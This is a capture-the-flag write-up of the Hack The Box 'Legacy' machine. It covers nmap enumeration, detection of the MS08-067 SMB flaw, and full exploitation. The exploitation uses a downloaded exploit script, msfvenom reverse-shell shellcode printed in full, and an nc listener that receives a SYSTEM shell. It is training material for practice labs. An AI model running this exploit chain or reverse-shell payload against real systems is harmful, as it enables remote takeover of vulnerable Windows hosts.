Content
Welcome to the Legacy writeup from HTB
tags:
Welcome to the Legacy writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Legacy
tags: HTB
Easy
Windows
OSCP
Platform: Hackthebox
Difficult: Easy
S.O.: Windows
Link: Click here
Enumeration
Nmap
To get started, we run a quick open ports scan.
$ nmap -Pn -T5 -p- 10.10.10.4
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-03 18:00 CEST
Nmap scan report for 10.10.10.4
Host is up (0.089s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp closed ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 119.79 seconds
Now that we know the open ports, let's scan them in depth.
$ nmap -A -Pn -p 139,445,3389 10.10.10.4
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-03 18:02 CEST
Nmap scan report for 10.10.10.4
Host is up (0.086s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000 (91%), General Dynamics embedded (88%)
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows XP SP2 or Windows Small Business Server 2003 (91%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (91%), Microsoft Windows XP SP2 (91%), Microsoft Windows XP SP2 or SP3 (90%), Microsoft Windows XP SP3 (90%), Microsoft Windows XP SP2 or Windows Server 2003 (90%), Microsoft Windows 2000 Server (89%), Microsoft Windows Server 2003 (89%), Microsoft Windows 2000 SP4 (89%), Microsoft Windows XP Professional SP3 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: -4h24m22s, deviation: 2h07m16s, median: -5h54m22s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:ef:ce (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2021-08-03T16:08:19+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 86.43 ms 10.10.14.1
2 86.41 ms 10.10.10.4
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.37 seconds
After trying to extract information with rpcinfo
and enum4linux
without getting anything interesting, we are going to look for vulnerabilities with Nmap.
$ nmap -A -Pn -p 139,445,3389 10.10.10.4 --script vuln
[...]
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
[...]
Searching the internet for the CVE-2008-4250
vulnerability we can find this exploit.
Exploitation
$ wget -O ms08_067_netapi.py https://www.exploit-db.com/download/40279
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.29 LPORT=8787 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python | sed 's/buf /shellcode /g'
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of python file: 1700 bytes
shellcode = b""
shellcode += b"\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81"
shellcode += b"\x76\x0e\x92\xaa\xf9\x92\x83\xee\xfc\xe2\xf4\x6e\x42"
shellcode += b"\x7b\x92\x92\xaa\x99\x1b\x77\x9b\x39\xf6\x19\xfa\xc9"
shellcode += b"\x19\xc0\xa6\x72\xc0\x86\x21\x8b\xba\x9d\x1d\xb3\xb4"
shellcode += b"\xa3\x55\x55\xae\xf3\xd6\xfb\xbe\xb2\x6b\x36\x9f\x93"
shellcode += b"\x6d\x1b\x60\xc0\xfd\x72\xc0\x82\x21\xb3\xae\x19\xe6"
shellcode += b"\xe8\xea\x71\xe2\xf8\x43\xc3\x21\xa0\xb2\x93\x79\x72"
shellcode += b"\xdb\x8a\x49\xc3\xdb\x19\x9e\x72\x93\x44\x9b\x06\x3e"
shellcode += b"\x53\x65\xf4\x93\x55\x92\x19\xe7\x64\xa9\x84\x6a\xa9"
shellcode += b"\xd7\xdd\xe7\x76\xf2\x72\xca\xb6\xab\x2a\xf4\x19\xa6"
shellcode += b"\xb2\x19\xca\xb6\xf8\x41\x19\xae\x72\x93\x42\x23\xbd"
shellcode += b"\xb6\xb6\xf1\xa2\xf3\xcb\xf0\xa8\x6d\x72\xf5\xa6\xc8"
shellcode += b"\x19\xb8\x12\x1f\xcf\xc2\xca\xa0\x92\xaa\x91\xe5\xe1"
shellcode += b"\x98\xa6\xc6\xfa\xe6\x8e\xb4\x95\x55\x2c\x2a\x02\xab"
shellcode += b"\xf9\x92\xbb\x6e\xad\xc2\xfa\x83\x79\xf9\x92\x55\x2c"
shellcode += b"\xc2\xc2\xfa\xa9\xd2\xc2\xea\xa9\xfa\x78\xa5\x26\x72"
shellcode += b"\x6d\x7f\x6e\xf8\x97\xc2\xf3\x98\x9c\xb7\x91\x90\x92"
shellcode += b"\x88\xaa\x1b\x74\xc0\xe9\xc4\xc5\xc2\x60\x37\xe6\xcb"
shellcode += b"\x06\x47\x17\x6a\x8d\x9e\x6d\xe4\xf1\xe7\x7e\xc2\x09"
shellcode += b"\x27\x30\xfc\x06\x47\xfa\xc9\x94\xf6\x92\x23\x1a\xc5"
shellcode += b"\xc5\xfd\xc8\x64\xf8\xb8\xa0\xc4\x70\x57\x9f\x55\xd6"
shellcode += b"\x8e\xc5\x93\x93\x27\xbd\xb6\x82\x6c\xf9\xd6\xc6\xfa"
shellcode += b"\xaf\xc4\xc4\xec\xaf\xdc\xc4\xfc\xaa\xc4\xfa\xd3\x35"
shellcode += b"\xad\x14\x55\x2c\x1b\x72\xe4\xaf\xd4\x6d\x9a\x91\x9a"
shellcode += b"\x15\xb7\x99\x6d\x47\x11\x19\x8f\xb8\xa0\x91\x34\x07"
shellcode += b"\x17\x64\x6d\x47\x96\xff\xee\x98\x2a\x02\x72\xe7\xaf"
shellcode += b"\x42\xd5\x81\xd8\x96\xf8\x92\xf9\x06\x47"
In the exploit explanation, we read that we must generate 30 NOP for a 380 bytes payload, but our payload is 348 bytes then we will generate 62 NOP instead 30.
$ python -c'print "shellcode += b\""+"\\x90"*62+"\""'
shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
Now we put a terminal to listen and execute the exploit...
$ python ms08_067_netapi.py 10.10.10.4 7
#######################################################################
# MS08-067 Exploit
# This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#######################################################################
Windows XP SP3 English (AlwaysOn NX)
[-]Initiating connection
[-]connected to ncacn_np:10.10.10.4[\pipe\browser]
Exploit finish
And we have shell!
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.4] 1036
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
And now we can read the user and root flags.
C:\Documents and Settings\john\Desktop>type user.txt
type user.txt
CENSORED_FLAG
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
CENSORED_FLAG